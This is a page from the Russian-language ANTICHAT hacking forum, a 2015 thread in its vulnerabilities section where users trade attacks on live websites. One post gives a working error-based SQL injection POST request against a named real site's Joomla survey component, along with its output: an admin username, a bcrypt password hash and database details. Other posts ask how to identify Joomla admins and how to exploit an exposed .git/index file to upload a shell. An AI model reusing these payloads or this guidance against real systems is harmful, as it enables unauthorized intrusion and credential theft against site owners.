HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #851  
Старый 13.11.2015, 01:56
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

или тот же mid.
или тот же substr? это аналогичные функции, не обязательно упоминать каждую
 
Ответить с цитированием

  #852  
Старый 17.11.2015, 05:40
jjokker
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме:
28766

Репутация: 34
Отправить сообщение для jjokker с помощью ICQ
По умолчанию

Цитата:
Сообщение от Paladin  
Paladin said:

http://kvestsetevichok.ru/index.php/press?view=category&id='
что то можно сделать? ибо не получается изменить запрос никак
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Зачем вы кавычку вконце поставили я вообще не пойму.
Unknown column 'root' in 'where clause'
Обычная ошибка бд, никакой sql inj
Код:
Code:
http://kvestsetevichok.ru/index.php?no_html=1&tmpl=component&option=com_surveyforce&task=survey.SF_ajaxAction
[POST]action=next&survey=1&start_id=21133&user_id=449c373991919e6a22eca19c18e4b11c&quest_id[]=21 or (select count(*) from information_schema.columns group by concat((select concat_ws(0x3a,substring(username,1,50),substring(password,1,50)) from nvehp_users limit 0,1),0x3a,floor(rand(0)*2)))--&answer[]=152

Duplicate entry 'main:$2y$10$I4IqeXwMb5JkzFTTvEXQW.r71Nq/14JJgiIk75jsSK1:1' for key 'group_key'
Duplicate entry '83195:1' for key 'group_key'
Duplicate entry 'sergrus_kvest15@localhost::5.5.36-34.0-632.prec::sergrus_kvest15'
 
Ответить с цитированием

  #853  
Старый 17.11.2015, 12:32
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

какая колонка в таблице %_users определяет админа сайта в послених версиях джумлы?

в предыдущих было usertype=Super Administrator
 
Ответить с цитированием

  #854  
Старый 19.11.2015, 21:34
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

На сайте ASP при смене пароля поставил 8 кавычек и он успешно сохранил пароль,но не ошибок,нечего не было . Это нормально? .
Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.
 
Ответить с цитированием

  #855  
Старый 20.11.2015, 12:49
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от AlexG  
AlexG said:

Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.
фишка в том,что я теперь не могу попасть в аккаунт .
 
Ответить с цитированием

  #856  
Старый 22.11.2015, 23:11
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

нашел сайт, при переходе в .git/index скачивается файл

как заюзать? спасибо
 
Ответить с цитированием

  #857  
Старый 22.11.2015, 23:15
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

скинь содержимое файла
 
Ответить с цитированием

  #858  
Старый 22.11.2015, 23:24
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Vip77  
Vip77 said:

скинь содержимое файла
там в основном пути wp-content/plugins/ и т.д
 
Ответить с цитированием

  #859  
Старый 23.11.2015, 00:12
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться.

но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости
 
Ответить с цитированием

  #860  
Старый 23.11.2015, 00:17
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

а если вот так сделать?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ